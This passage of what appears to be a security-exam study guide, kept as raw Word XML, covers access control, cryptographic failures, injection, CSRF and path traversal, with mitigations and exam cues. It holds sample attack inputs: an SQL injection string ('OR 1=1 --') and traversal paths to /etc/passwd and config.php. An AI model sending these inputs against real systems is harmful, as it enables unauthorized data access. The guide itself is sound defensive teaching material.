    <w:p w14:paraId="7D7D2CF4" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Hidden admin features accessible by direct URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46328919" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC252AF" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Enforce authorization checks on every request (server-side).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EACBCF" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Principle of least privilege.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32997B93" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use role-based access control (RBAC).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452672CB" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Don’t rely on hidden or client-side controls only (e.g., UI hiding).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0EBF05" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exam triggers (broken access control)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Look for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C30486" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“User can see other user’s data by changing ID in URL.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B915D21" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“Unprivileged user can call admin function.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AE634C" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The right answer will mention </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>authorization checks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RBAC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>least privilege</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>server-side enforcement</w:t>
      </w:r>
      <w:r>
        <w:t>, not just “encryption” or “firewall.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5724502C" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00E06859">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2724819A" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>5. Cryptographic failures (formerly “Sensitive data exposure”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8CADB6" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Core idea</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F104DF" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Sensitive data (passwords, credit cards, PII, etc.) is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>not properly protected</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in storage or transit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A54AC1C" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5BAADB" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Plaintext passwords or credit cards in DB or logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B650A0" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>TLS not used; weak protocols (SSLv2/3, TLS 1.0).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3FE563" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Hardcoded or shared keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274FE9F2" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCEC0BB" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>strong, industry-standard crypto</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (TLS 1.2+, AES).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C49B46" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Hash passwords with strong algorithms (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bcrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, PBKDF2, Argon2).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0685C85D" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Encrypt data at rest and in transit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55645C0B" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Proper key management: rotation, storage in HSM/KMS, no hard-coded keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062BFE0C" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Avoid legacy/weak ciphers and protocols.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06596EA3" w14:textId="77777777" w:rsidR="000F7397" w:rsidRDefault="000F7397">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C1115A9" w14:textId="77777777" w:rsidR="000F7397" w:rsidRDefault="000F7397">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60BDC2FC" w14:textId="2FF60456" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Exam triggers (cryptographic failures)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Look for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEE3953" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“Plaintext,” “weak encryption,” “SSL,” “MD5/SHA1 for passwords,” “no TLS.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501A280D" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Correct mitigation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>use strong encryption, hashing, TLS, proper key management</w:t>
      </w:r>
      <w:r>
        <w:t>, not just “obfuscation” or “firewall.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167F6127" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00E06859">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FBED442" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>6. Injection flaws</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E1BF91" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Core idea</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7F047A" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Untrusted input is interpreted as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>code or commands</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by some interpreter (SQL, LDAP, OS shell, XML parser, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDB9E40" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Common types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4052E699" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SQL Injection: SELECT * FROM users WHERE user=' ' OR 1=1 --'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47656468" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Command injection: user input used in bash, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C9C80B" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>LDAP, XPath, XML injections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330C14CE" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7186EF43" w14:textId="77777777" w:rsidR="00E06859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Parameterized queries / prepared statements</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (for SQL, LDAP, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6095C1AB" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Input validation and whitelisting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C339F5A" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Least privilege accounts for DB and services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13751E8F" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Avoid string concatenation to build queries/commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2205EE" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exam triggers (injection)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Look for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274A34DC" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Examples in queries (OR 1=1, semicolons, ' in input), or “user input is concatenated into SQL/LDAP/OS command.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DA94A4" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mitigation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>parameterized queries</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>stored procedures (securely written)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>input validation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>least privilege</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308544AD" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00E06859">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03A8664F" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>7. Cross-site request forgery (CSRF / XSRF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E69A6C9" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Core idea</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66304ECD" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Browser is tricked into sending </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>authenticated requests</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to a site where the user is logged in, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>without their intent</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664BE9F5" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="095B53E5" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>User logs into a banking site.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAE1D49" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Then visits attacker’s site which contains hidden form or image that triggers a POST to bank with cookies attached (transfer funds).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A629A0" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Key difference vs XSS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7297AA20" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">CSRF uses </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>the victim’s browser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and existing session to send requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F668702" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>XSS injects script into the trusted site itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B563B74" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1633C848" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Anti-CSRF tokens (unique per session/request, validated server-side).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B971E4A" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Require re-auth/MFA for critical actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F71D632" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SameSite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> cookies (Lax/Strict).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3329C8" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Check </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>referer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/origin headers where appropriate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F903361" w14:textId="77777777" w:rsidR="000F7397" w:rsidRDefault="000F7397">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1048EACB" w14:textId="77777777" w:rsidR="000F7397" w:rsidRDefault="000F7397">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ED6D3E5" w14:textId="3A0FEECC" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Exam triggers (CSRF)</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Look for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628BC3CB" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>“User is logged in; attacker’s page causes unwanted action (fund transfer, password change) without user clicking the bank’s site.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E32727" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Correct mitigation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">CSRF tokens, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SameSite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> cookies, re-auth</w:t>
      </w:r>
      <w:r>
        <w:t>, not “encrypt data” or “password policy.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7361C5ED" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00E06859">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08F30F3C" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>8. Directory traversal (path traversal)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9C2744" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Core idea</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549B5DED" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Attacker manipulates file paths to access files </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>outside the intended directory</w:t>
      </w:r>
      <w:r>
        <w:t>, e.g., ../../../../etc/passwd.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676F419C" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Patterns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3234E8D2" w14:textId="77777777" w:rsidR="00E06859" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>User-supplied file name appended to a path, like /images/ + ../../</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>config.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
